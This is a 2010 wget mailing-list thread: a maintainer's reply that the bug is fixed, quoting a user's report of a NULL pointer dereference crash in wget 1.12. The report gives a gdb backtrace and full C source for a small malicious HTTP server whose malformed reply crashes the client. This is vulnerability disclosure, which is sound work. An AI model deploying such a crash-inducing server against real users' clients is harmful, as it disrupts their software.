
Re: [Bug-wget] wget bug report


From: Giuseppe Scrivano
Subject: Re: [Bug-wget] wget bug report
Date: Fri, 14 May 2010 21:36:35 +0200
User-agent: Gnus/5.13 (Gnus v5.13) Emacs/24.0.50 (gnu/linux)

Thanks for your report.  This bug is already fixed in the source
repository.

Cheers,
Giuseppe



Ildar Isaev <address@hidden> writes:

> Hi, i downloaded wget-1.12 from ftp://ftp.gnu.org/gnu/wget/wget-1.12.tar.bz2
>
> It turns out it has a null pointer dereference bug. This is how it may
> be reproduced.
>
> Expl_for_wget.c (attached) is a small pseudo web server. Compile it and run:
>
> address@hidden:$ gcc -Wall expl_for_wget.c -o expl_for_wget
> address@hidden:$ ./expl_for_wget &
> [1] 7330
> address@hidden:$ gdb --args <path_to_wget_install_dir>/bin/wget
> http://127.0.0.1:3500/
> GNU gdb 6.8-debian
> Copyright (C) 2008 Free Software Foundation, Inc.
> License GPLv3+: GNU GPL version 3 or later
> <http://gnu.org/licenses/gpl.html>
> This is free software: you are free to change and redistribute it.
> There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
> and "show warranty" for details.
> This GDB was configured as "i486-linux-gnu"...
> (gdb) run
> [Thread debugging using libthread_db enabled]
> --2010-05-14 22:39:36--  http://127.0.0.1:3500/
> Connecting to 127.0.0.1:3500... connected.
> HTTP request sent, awaiting response... [New Thread 0x403a26c0 (LWP 7332)]
>
> Program received signal SIGSEGV, Segmentation fault.
> [Switching to Thread 0x403a26c0 (LWP 7332)]
> 0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> (gdb) bt
> #0  0x40286613 in strlen () from /lib/tls/i686/cmov/libc.so.6
> #1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> #2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> #3  0x08066151 in http_loop (u=0x8a280e8, newloc=0xbffa8dec,
> local_file=0xbffa8dd8, referer=0x0, dt=0xbffa8f24, proxy=0x0,
>    iri=0x8a27d40) at http.c:2581
> #4  0x08072798 in retrieve_url (orig_parsed=0x8a280e8,
> origurl=0x8a27dd8 "http://127.0.0.1:3500/", file=0xbffa8f2c,
>    newloc=0xbffa8f28, refurl=0x0, dt=0xbffa8f24, recursive=false,
> iri=0x8a27d40, register_status=true) at retr.c:692
> #5  0x0806c46e in main (argc=2, argv=0xbffa9014) at main.c:1294
> (gdb) up
> #1  0x08081a2d in xstrdup (string=0x0) at xmalloc.c:117
> 117      return xmemdup (string, strlen (string) + 1);
> (gdb)
> #2  0x08063c7d in gethttp (u=0x8a280e8, hs=0xbffa8be0, dt=0xbffa8f24,
> proxy=0x0, iri=0x8a27d40) at http.c:1832
> 1832      hs->message = xstrdup (message);
> (gdb) list
> 1827      resp = resp_new (head);
> 1828
> 1829      /* Check for status line.  */
> 1830      message = NULL;
> 1831      statcode = resp_status (resp, &message);
> 1832      hs->message = xstrdup (message);
> 1833      if (!opt.server_response)
> 1834        logprintf (LOG_VERBOSE, "%2d %s\n", statcode,
> 1835                   message ? quotearg_style (escape_quoting_style,
> message) : "");
> 1836      else
> (gdb) p message
> $1 = 0x0
>
> One can see that the null pointer dereference occurs at http.c:1832 because
> 'message' is equal to null.
>
> Best regards,
> Ildar
>
> /* Server code in C */
> //exploit_13
>  
> #include <sys/types.h>
> #include <sys/socket.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>  
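> /*
>  * Minimal single-shot TCP server for reproducing the wget-1.12 crash
>  * described above: it accepts one connection on 127.0.0.1:3500, writes
>  * one fixed 227-byte reply, closes both sockets and exits.
>  *
>  * The reply starts with "HTTP", then NUL bytes, then a blank line, i.e.
>  * a status line with no status text; per the gdb session quoted above,
>  * resp_status() then leaves `message` NULL and xstrdup(message)
>  * dereferences it at http.c:1832.
>  *
>  * Returns 0 once the reply has been fully written.  On any socket,
>  * bind, listen, accept or write error it reports via perror() and
>  * exits with EXIT_FAILURE after closing whatever it had opened.
>  */
> int main(void)
> {
>   struct sockaddr_in stSockAddr;
>   int sfd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
>
>   if(sfd == -1)
>   {
>     perror("can not create socket");
>     exit(EXIT_FAILURE);
>   }
>
>   memset(&stSockAddr, 0, sizeof stSockAddr);
>
>   stSockAddr.sin_family = AF_INET;
>   stSockAddr.sin_port = htons(3500);
>   /* inet_pton() returns 1 on success (0 = unparsable text, -1 = bad
>      family); errno is not set for 0, so report without perror(). */
>   if(inet_pton(AF_INET, "127.0.0.1", &stSockAddr.sin_addr) != 1)
>   {
>     fprintf(stderr, "error inet_pton failed\n");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>
>   if(bind(sfd, (const struct sockaddr*)&stSockAddr, sizeof stSockAddr) == -1)
>   {
>     perror("error bind failed");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>
>   if(listen(sfd, 10) == -1)
>   {
>     perror("error listen failed");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>
>   int cfd = accept(sfd, NULL, NULL);
>
>   /* The original wrote to cfd even when accept() had returned -1. */
>   if(cfd == -1)
>   {
>     perror("error accept failed");
>     close(sfd);
>     exit(EXIT_FAILURE);
>   }
>
>   /* Same 227 bytes as the original literal, spelled with C99 designated
>      initializers: "HTTP", twelve NULs, "\n\n" at offsets 16-17, and NUL
>      padding to the end of the array. */
>   char buf[227] = {0x48, 0x54, 0x54, 0x50, [16] = 0x0A, 0x0A};
>
>   /* write() on a socket may be short; loop until every byte is out. */
>   size_t sent = 0;
>   while(sent < sizeof buf)
>   {
>     ssize_t n = write(cfd, buf + sent, sizeof buf - sent);
>     if(n == -1)
>     {
>       perror("error write failed");
>       close(cfd);
>       close(sfd);
>       exit(EXIT_FAILURE);
>     }
>     sent += (size_t)n;
>   }
>
>   close(cfd);
>   close(sfd);  /* the original leaked the listening socket */
>
>   return 0;
> }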


